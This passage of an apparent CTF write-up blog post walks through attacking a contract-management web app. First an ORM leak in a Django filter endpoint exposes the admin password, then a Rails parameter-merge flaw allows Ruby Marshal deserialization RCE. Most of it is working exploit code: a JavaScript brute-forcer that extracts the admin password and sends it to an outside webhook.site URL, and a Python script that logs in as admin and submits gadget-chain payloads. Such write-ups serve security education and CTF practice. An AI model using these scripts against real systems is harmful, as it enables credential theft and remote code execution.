<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#FF7B72">class</span><span style="color:#FFA657"> FilteredContractsView</span><span style="color:#E6EDF3">(</span><span style="color:#79C0FF">APIView</span><span style="color:#E6EDF3">):</span></span>
<span class="line"><span style="color:#E6EDF3">    permission_classes </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> [IsAuthenticated, IsContractManagerOrAdmin]</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">    def</span><span style="color:#D2A8FF"> post</span><span style="color:#E6EDF3">(self, request, format</span><span style="color:#FF7B72">=</span><span style="color:#79C0FF">None</span><span style="color:#E6EDF3">):</span></span>
<span class="line"><span style="color:#FF7B72">        try</span><span style="color:#E6EDF3">:</span></span>
<span class="line"><span style="color:#FF7B72">            if</span><span style="color:#E6EDF3"> request.data.get(</span><span style="color:#A5D6FF">"all"</span><span style="color:#E6EDF3">) </span><span style="color:#FF7B72">==</span><span style="color:#79C0FF"> True</span><span style="color:#E6EDF3">:</span></span>
<span class="line"><span style="color:#E6EDF3">                contracts </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> Contract.objects.all()</span></span>
<span class="line"><span style="color:#FF7B72">            else</span><span style="color:#E6EDF3">:</span></span>
<span class="line"><span style="color:#E6EDF3">                filtered_data </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> {key: value </span><span style="color:#FF7B72">for</span><span style="color:#E6EDF3"> key, value </span><span style="color:#FF7B72">in</span><span style="color:#E6EDF3"> request.data.items() </span><span style="color:#FF7B72">if</span><span style="color:#E6EDF3"> key </span><span style="color:#FF7B72">!=</span><span style="color:#A5D6FF"> "all"</span><span style="color:#E6EDF3">}</span></span>
<span class="line"><span style="color:#E6EDF3">                contracts </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> Contract.objects.filter(</span><span style="color:#FF7B72">**</span><span style="color:#E6EDF3">filtered_data)</span></span>
<span class="line"><span style="color:#E6EDF3">            serializer </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> ContractSerializer(contracts, </span><span style="color:#FFA657">many</span><span style="color:#FF7B72">=</span><span style="color:#79C0FF">True</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#FF7B72">        except</span><span style="color:#79C0FF"> Exception</span><span style="color:#FF7B72"> as</span><span style="color:#E6EDF3"> e:</span></span>
<span class="line"><span style="color:#FF7B72">            return</span><span style="color:#E6EDF3"> Response({</span><span style="color:#A5D6FF">"error"</span><span style="color:#E6EDF3">: </span><span style="color:#79C0FF">str</span><span style="color:#E6EDF3">(e)}, </span><span style="color:#FFA657">status</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">status.</span><span style="color:#79C0FF">HTTP_400_BAD_REQUEST</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#FF7B72">        return</span><span style="color:#E6EDF3"> Response(serializer.data, </span><span style="color:#FFA657">status</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">status.</span><span style="color:#79C0FF">HTTP_200_OK</span><span style="color:#E6EDF3">)</span></span></code></pre>
<p>This specific line of code makes it <a href="https://www.elttam.com/blog/plormbing-your-django-orm/">vulnerable to an ORM leak</a>:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#E6EDF3">filtered_data </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> {key: value </span><span style="color:#FF7B72">for</span><span style="color:#E6EDF3"> key, value </span><span style="color:#FF7B72">in</span><span style="color:#E6EDF3"> request.data.items() </span><span style="color:#FF7B72">if</span><span style="color:#E6EDF3"> key </span><span style="color:#FF7B72">!=</span><span style="color:#A5D6FF"> "all"</span><span style="color:#E6EDF3">}</span></span>
<span class="line"><span style="color:#E6EDF3">contracts </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> Contract.objects.filter(</span><span style="color:#FF7B72">**</span><span style="color:#E6EDF3">filtered_data)</span></span></code></pre>
<p>Logging in as <code>contract_manager</code> on a local instance shows how the frontend calls the endpoint.</p>
<p><img src="/images/encodecept/fil.webp" alt="Filtered Contracts"></p>
<p>It simply passes the parameters as URL parameters. The contract model has a foreign key:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#FF7B72">class</span><span style="color:#FFA657"> Contract</span><span style="color:#E6EDF3">(</span><span style="color:#79C0FF">models</span><span style="color:#E6EDF3">.</span><span style="color:#79C0FF">Model</span><span style="color:#E6EDF3">):</span></span>
<span class="line"><span style="color:#79C0FF">    ...SNIP...</span></span>
<span class="line"><span style="color:#E6EDF3">    created_at </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> models.DateTimeField(</span><span style="color:#FFA657">auto_now_add</span><span style="color:#FF7B72">=</span><span style="color:#79C0FF">True</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    updated_at </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> models.DateTimeField(</span><span style="color:#FFA657">auto_now</span><span style="color:#FF7B72">=</span><span style="color:#79C0FF">True</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    owner </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> models.ForeignKey(</span></span>
<span class="line"><span style="color:#E6EDF3">        settings.</span><span style="color:#79C0FF">AUTH_USER_MODEL</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#FFA657">        on_delete</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">models.</span><span style="color:#79C0FF">CASCADE</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#FFA657">        related_name</span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF">'contracts'</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#FFA657">        help_text</span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF">"User who owns the contract"</span></span>
<span class="line"><span style="color:#E6EDF3">    )</span></span>
<span class="line"><span style="color:#79C0FF">    ...SNIP...</span></span></code></pre>
<p>This means we can leak the admin’s password. To achieve this, we need to create a JavaScript script to brute-force the password:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="javascript"><code><span class="line"><span style="color:#FF7B72">const</span><span style="color:#79C0FF"> characters</span><span style="color:#FF7B72"> =</span><span style="color:#A5D6FF"> "abcdefghijklmnopqrstuvwxyz"</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#FF7B72">let</span><span style="color:#E6EDF3"> gotFullPassword </span><span style="color:#FF7B72">=</span><span style="color:#79C0FF"> false</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#FF7B72">let</span><span style="color:#E6EDF3"> currentPassword </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> ''</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#FF7B72">let</span><span style="color:#E6EDF3"> webhook </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> 'https://webhook.site/aa05fd5b-f4da-42ee-9c08-75cc1d9a6de9'</span><span style="color:#E6EDF3">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">async</span><span style="color:#FF7B72"> function</span><span style="color:#D2A8FF"> bruteForce</span><span style="color:#E6EDF3">() {</span></span>
<span class="line"><span style="color:#FF7B72">    while</span><span style="color:#E6EDF3"> (</span><span style="color:#FF7B72">!</span><span style="color:#E6EDF3">gotFullPassword) {</span></span>
<span class="line"><span style="color:#FF7B72">        for</span><span style="color:#E6EDF3"> (</span><span style="color:#FF7B72">let</span><span style="color:#E6EDF3"> i </span><span style="color:#FF7B72">=</span><span style="color:#79C0FF"> 0</span><span style="color:#E6EDF3">; i </span><span style="color:#FF7B72">&#x3C;</span><span style="color:#E6EDF3"> characters.</span><span style="color:#79C0FF">length</span><span style="color:#E6EDF3">; i</span><span style="color:#FF7B72">++</span><span style="color:#E6EDF3">) {</span></span>
<span class="line"><span style="color:#FF7B72">            const</span><span style="color:#79C0FF"> testPassword</span><span style="color:#FF7B72"> =</span><span style="color:#E6EDF3"> currentPassword </span><span style="color:#FF7B72">+</span><span style="color:#E6EDF3"> characters[i];</span></span>
<span class="line"><span style="color:#FF7B72">            const</span><span style="color:#79C0FF"> prefixResponse</span><span style="color:#FF7B72"> =</span><span style="color:#FF7B72"> await</span><span style="color:#D2A8FF"> fetch</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">`/contracts/manage?owner__password__startswith=${</span><span style="color:#E6EDF3">testPassword</span><span style="color:#A5D6FF">}&#x26;owner__username=admin`</span><span style="color:#E6EDF3">);</span></span>
<span class="line"><span style="color:#FF7B72">            const</span><span style="color:#79C0FF"> prefixData</span><span style="color:#FF7B72"> =</span><span style="color:#FF7B72"> await</span><span style="color:#E6EDF3"> prefixResponse.</span><span style="color:#D2A8FF">text</span><span style="color:#E6EDF3">();</span></span>
<span class="line"><span style="color:#FF7B72">            if</span><span style="color:#E6EDF3"> (</span><span style="color:#FF7B72">!</span><span style="color:#E6EDF3">prefixData.</span><span style="color:#D2A8FF">includes</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">'No contracts found based on the current filter.'</span><span style="color:#E6EDF3">)) {</span></span>
<span class="line"><span style="color:#E6EDF3">                currentPassword </span><span style="color:#FF7B72">+=</span><span style="color:#E6EDF3"> characters[i];</span></span>
<span class="line"><span style="color:#FF7B72">                const</span><span style="color:#79C0FF"> fullResponse</span><span style="color:#FF7B72"> =</span><span style="color:#FF7B72"> await</span><span style="color:#D2A8FF"> fetch</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">`/contracts/manage?owner__password=${</span><span style="color:#E6EDF3">currentPassword</span><span style="color:#A5D6FF">}&#x26;owner__username=admin`</span><span style="color:#E6EDF3">);</span></span>
<span class="line"><span style="color:#FF7B72">                const</span><span style="color:#79C0FF"> fullData</span><span style="color:#FF7B72"> =</span><span style="color:#FF7B72"> await</span><span style="color:#E6EDF3"> fullResponse.</span><span style="color:#D2A8FF">text</span><span style="color:#E6EDF3">();</span></span>
<span class="line"><span style="color:#FF7B72">                if</span><span style="color:#E6EDF3"> (</span><span style="color:#FF7B72">!</span><span style="color:#E6EDF3">fullData.</span><span style="color:#D2A8FF">includes</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">'No contracts found based on the current filter.'</span><span style="color:#E6EDF3">)) {</span></span>
<span class="line"><span style="color:#E6EDF3">                    gotFullPassword </span><span style="color:#FF7B72">=</span><span style="color:#79C0FF"> true</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#E6EDF3">                    console.</span><span style="color:#D2A8FF">log</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">`Password found: ${</span><span style="color:#E6EDF3">currentPassword</span><span style="color:#A5D6FF">}`</span><span style="color:#E6EDF3">);</span></span>
<span class="line"><span style="color:#FF7B72">                    await</span><span style="color:#D2A8FF"> fetch</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">`${</span><span style="color:#E6EDF3">webhook</span><span style="color:#A5D6FF">}?x=${</span><span style="color:#D2A8FF">encodeURIComponent</span><span style="color:#A5D6FF">(</span><span style="color:#E6EDF3">currentPassword</span><span style="color:#A5D6FF">)</span><span style="color:#A5D6FF">}`</span><span style="color:#E6EDF3">);</span></span>
<span class="line"><span style="color:#FF7B72">                    return</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#E6EDF3">                }</span></span>
<span class="line"><span style="color:#FF7B72">                break</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#E6EDF3">            }</span></span>
<span class="line"><span style="color:#E6EDF3">        }</span></span>
<span class="line"><span style="color:#E6EDF3">    }</span></span>
<span class="line"><span style="color:#E6EDF3">}</span></span>
<span class="line"><span style="color:#D2A8FF">bruteForce</span><span style="color:#E6EDF3">();</span></span></code></pre>
<p>Using all of the above together gives us the admin’s password:</p>
<p><img src="/images/encodecept/pas.webp" alt="Admin Password"></p>
<p>Logging in as admin grants us access to new functionality, <code>Manage Templates</code>:</p>
<p><img src="/images/encodecept/super.webp" alt="Manage Templates"></p>
<p>Examining the Rails controller for this feature:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="ruby"><code><span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> create</span></span>
<span class="line"><span style="color:#FFA657">    user_data</span><span style="color:#FF7B72"> =</span><span style="color:#E6EDF3"> current_user </span><span style="color:#FF7B72">unless</span><span style="color:#E6EDF3"> user_data </span><span style="color:#FF7B72">&#x26;&#x26;</span><span style="color:#E6EDF3"> user_data[</span><span style="color:#A5D6FF">'id'</span><span style="color:#E6EDF3">]</span></span>
<span class="line"><span style="color:#E6EDF3">    flash[</span><span style="color:#79C0FF">:alert</span><span style="color:#E6EDF3">] </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> "User must be logged in to create a template."</span></span>
<span class="line"><span style="color:#E6EDF3">    redirect_to login_path </span><span style="color:#FF7B72">and</span><span style="color:#FF7B72"> return</span></span>
<span class="line"><span style="color:#FF7B72">end</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FFA657">serialized_content</span><span style="color:#FF7B72"> =</span><span style="color:#79C0FF"> Marshal</span><span style="color:#E6EDF3">.</span><span style="color:#D2A8FF">dump</span><span style="color:#E6EDF3">(params[</span><span style="color:#79C0FF">:content</span><span style="color:#E6EDF3">])</span></span>
<span class="line"><span style="color:#FFA657">response</span><span style="color:#FF7B72"> =</span><span style="color:#79C0FF"> HTTP</span><span style="color:#E6EDF3">.</span><span style="color:#D2A8FF">auth</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">"Token </span><span style="color:#FF7B72">#{</span><span style="color:#A5D6FF">session[</span><span style="color:#79C0FF">:token</span><span style="color:#A5D6FF">]</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    .</span><span style="color:#D2A8FF">post</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">"http://localhost:8080/api/contract_templates/"</span><span style="color:#E6EDF3">, </span><span style="color:#79C0FF">json:</span><span style="color:#E6EDF3"> {</span></span>
<span class="line"><span style="color:#79C0FF">        data:</span><span style="color:#E6EDF3"> serialized_content,</span></span>
<span class="line"><span style="color:#79C0FF">        user_id:</span><span style="color:#E6EDF3"> user_data[</span><span style="color:#A5D6FF">'id'</span><span style="color:#E6EDF3">]</span></span>
<span class="line"><span style="color:#E6EDF3">    }.</span><span style="color:#D2A8FF">merge</span><span style="color:#E6EDF3">(params.</span><span style="color:#D2A8FF">to_unsafe_h</span><span style="color:#E6EDF3">))</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">if</span><span style="color:#E6EDF3"> response.</span><span style="color:#D2A8FF">status</span><span style="color:#E6EDF3">.</span><span style="color:#D2A8FF">success?</span></span>
<span class="line"><span style="color:#E6EDF3">    flash[</span><span style="color:#79C0FF">:notice</span><span style="color:#E6EDF3">] </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> "Template created successfully."</span></span>
<span class="line"><span style="color:#E6EDF3">    redirect_to contract_templates_path</span></span>
<span class="line"><span style="color:#FF7B72">else</span></span>
<span class="line"><span style="color:#E6EDF3">    flash.</span><span style="color:#D2A8FF">now</span><span style="color:#E6EDF3">[</span><span style="color:#79C0FF">:alert</span><span style="color:#E6EDF3">] </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> "Failed to create template."</span></span>
<span class="line"><span style="color:#E6EDF3">    render </span><span style="color:#79C0FF">:new</span></span>
<span class="line"><span style="color:#FF7B72">end</span></span></code></pre>
<p>The <code>create</code> method performs the following actions:</p>
<ol>
<li><strong>Checks if the user is logged in:</strong> If not, it redirects to the login page with an error message.</li>
<li><strong>Serializes template content:</strong> Converts <code>params[:content]</code> into a binary format using <code>Marshal.dump</code>.</li>
<li><strong>Sends data to the API:</strong> Sends a POST request with the serialized content, user ID, and form data to the backend API.</li>
<li><strong>Handles API response:</strong>
<ul>
<li><strong>On success:</strong> Displays a success message and redirects to the templates page.</li>
<li><strong>On failure:</strong> Displays an error message and re-renders the <code>new</code> template form.</li>
</ul>
</li>
</ol>
<p>This piece of code has a couple of issues:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="ruby"><code><span class="line"><span style="color:#FFA657">response</span><span style="color:#FF7B72"> =</span><span style="color:#79C0FF"> HTTP</span><span style="color:#E6EDF3">.</span><span style="color:#D2A8FF">auth</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">"Token </span><span style="color:#FF7B72">#{</span><span style="color:#A5D6FF">session[</span><span style="color:#79C0FF">:token</span><span style="color:#A5D6FF">]</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    .</span><span style="color:#D2A8FF">post</span><span style="color:#E6EDF3">(</span><span style="color:#A5D6FF">"http://localhost:8080/api/contract_templates/"</span><span style="color:#E6EDF3">, </span><span style="color:#79C0FF">json:</span><span style="color:#E6EDF3"> {</span></span>
<span class="line"><span style="color:#79C0FF">        data:</span><span style="color:#E6EDF3"> serialized_content,</span></span>
<span class="line"><span style="color:#79C0FF">        user_id:</span><span style="color:#E6EDF3"> user_data[</span><span style="color:#A5D6FF">'id'</span><span style="color:#E6EDF3">]</span></span>
<span class="line"><span style="color:#E6EDF3">    }.</span><span style="color:#D2A8FF">merge</span><span style="color:#E6EDF3">(params.</span><span style="color:#D2A8FF">to_unsafe_h</span><span style="color:#E6EDF3">))</span></span></code></pre>
<p>The merge order makes this vulnerable. If we provide a <code>data</code> parameter, it overrides the serialized content generated by the controller. We can therefore supply malicious serialized data that is deserialized later, leading to Remote Code Execution (RCE). I used this recent <a href="https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization/blob/main/marshal/3.4-rc/marshal-rce-ruby-3.4-rc.rb">Rails Universal RCE gadget chain</a> in the exploit script.</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#FF7B72">import</span><span style="color:#E6EDF3"> requests</span></span>
<span class="line"><span style="color:#FF7B72">from</span><span style="color:#E6EDF3"> bs4 </span><span style="color:#FF7B72">import</span><span style="color:#E6EDF3"> BeautifulSoup</span></span>
<span class="line"></span>
<span class="line"><span style="color:#E6EDF3">username </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> "admin"</span></span>
<span class="line"><span style="color:#E6EDF3">password </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> "cgfszyiotmtacdmnletkkaohwtkadmycottsysijegvxfplvovaqemmqgdapmazr"</span></span>
<span class="line"><span style="color:#E6EDF3">base_url </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> "http://127.0.0.1:1337"</span></span>
<span class="line"><span style="color:#E6EDF3">session </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> requests.Session()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> getAuthenToken</span><span style="color:#E6EDF3">(html):</span></span>
<span class="line"><span style="color:#E6EDF3">    soup </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> BeautifulSoup(html, </span><span style="color:#A5D6FF">"html.parser"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#FF7B72">    return</span><span style="color:#E6EDF3"> soup.find(</span><span style="color:#A5D6FF">"input"</span><span style="color:#E6EDF3">, {</span><span style="color:#A5D6FF">"name"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"authenticity_token"</span><span style="color:#E6EDF3">})[</span><span style="color:#A5D6FF">"value"</span><span style="color:#E6EDF3">]</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> login</span><span style="color:#E6EDF3">():</span></span>
<span class="line"><span style="color:#E6EDF3">    login_page </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.get(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/login"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    login_page.raise_for_status()</span></span>
<span class="line"><span style="color:#E6EDF3">    authenticity_token </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> getAuthenToken(login_page.text)</span></span>
<span class="line"><span style="color:#E6EDF3">    login_payload </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> {</span></span>
<span class="line"><span style="color:#A5D6FF">        "username"</span><span style="color:#E6EDF3">: username,</span></span>
<span class="line"><span style="color:#A5D6FF">        "password"</span><span style="color:#E6EDF3">: password,</span></span>
<span class="line"><span style="color:#A5D6FF">        "authenticity_token"</span><span style="color:#E6EDF3">: authenticity_token</span></span>
<span class="line"><span style="color:#E6EDF3">    }</span></span>
<span class="line"><span style="color:#E6EDF3">    response </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.post(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/login"</span><span style="color:#E6EDF3">, </span><span style="color:#FFA657">data</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">login_payload)</span></span>
<span class="line"><span style="color:#E6EDF3">    response.raise_for_status()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> deserializationRCE</span><span style="color:#E6EDF3">(typd):</span></span>
<span class="line"><span style="color:#FF7B72">    with</span><span style="color:#79C0FF"> open</span><span style="color:#E6EDF3">(typd, </span><span style="color:#A5D6FF">"rb"</span><span style="color:#E6EDF3">) </span><span style="color:#FF7B72">as</span><span style="color:#FFA657"> file</span><span style="color:#E6EDF3">:</span></span>
<span class="line"><span style="color:#E6EDF3">        content_data </span><span style="color:#FF7B72">=</span><span style="color:#FFA657"> file</span><span style="color:#E6EDF3">.read()</span></span>
<span class="line"><span style="color:#E6EDF3">    contracts_page </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.get(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/contract_templates/new"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    contracts_page.raise_for_status()</span></span>
<span class="line"><span style="color:#E6EDF3">    authenticity_token </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> getAuthenToken(contracts_page.text)</span></span>
<span class="line"><span style="color:#E6EDF3">    contracts_payload </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> {</span></span>
<span class="line"><span style="color:#A5D6FF">        "authenticity_token"</span><span style="color:#E6EDF3">: authenticity_token,</span></span>
<span class="line"><span style="color:#A5D6FF">        "name"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"hh"</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#A5D6FF">        "description"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"hh"</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#A5D6FF">        "content"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"hh"</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#A5D6FF">        "commit"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"Create Template"</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#A5D6FF">        "data"</span><span style="color:#E6EDF3">: content_data</span></span>
<span class="line"><span style="color:#E6EDF3">    }</span></span>
<span class="line"><span style="color:#E6EDF3">    response </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.post(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/contract_templates"</span><span style="color:#E6EDF3">, </span><span style="color:#FFA657">data</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">contracts_payload)</span></span>
<span class="line"><span style="color:#E6EDF3">    response.raise_for_status()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#E6EDF3">login()</span></span>
<span class="line"><span style="color:#E6EDF3">deserializationRCE(</span><span style="color:#A5D6FF">'detection.txt'</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">deserializationRCE(</span><span style="color:#A5D6FF">'rce.txt'</span><span style="color:#E6EDF3">)</span></span></code></pre>
<p>Running this script adds two templates. Viewing those templates results in RCE.</p></article> </div> <section class="end"> <div class="related"> <p class="cap">Same signals</p> <ul> <li style="--hue:#FFBABB"> <a href="/post/intergalactic-bounty/"> <span class="rn">03</span> <b>MXSS → RCE</b> <em>shared &middot; ctf</em> </a> </li><li style="--hue:#F7BCF1"> <a href="/post/sanitize-html-bypass-mxss/"> <span class="rn">05</span> <b>Mutation XSS</b> <em>shared &middot; xss</em> </a> </li> </ul> </div> <nav class="pager"> <a class="pg" href="/post/intergalactic-bounty/" style="--hue:#FFBABB"> <span class="dir">&larr; Newer</span> <b>Intergalactic Bounty: HTB University CTF 2024</b> </a> <span class="pg r none"><span class="dir">Older &rarr;</span><b>This is the earliest.</b></span> </nav> <p class="back"><a href="/">Back to posters</a></p> </section> <footer class="foot"> <span>Rajat Raghav &mdash; xclow3n</span> <a href="mailto:me@xclow3n.com">me@xclow3n.com</a> <span class="sp">Found, reported, patched.</span> </footer>  <script>
(function () {
  var doc = document.documentElement;
  var links = Array.prototype.slice.call(document.querySelectorAll('.toc a'));
  var secs = links.map(function (a) { return document.getElementById(a.dataset.sec); });
  var tick = false;

  function paint() {
    tick = false;
    var max = Math.max(1, doc.scrollHeight - innerHeight);
    doc.style.setProperty('--read', Math.min(100, (scrollY / max) * 100).toFixed(2) + '%');
    var y = scrollY + innerHeight * 0.3, cur = -1;
    secs.forEach(function (s, i) { if (s && s.offsetTop <= y) cur = i; });
    links.forEach(function (a, i) { a.classList.toggle('on', i === cur); });
  }
  addEventListener('scroll', function () {
    if (!tick) { tick = true; requestAnimationFrame(paint); }
  }, { passive: true });
  addEventListener('resize', paint);
  paint();
})();
</script>  </body></html>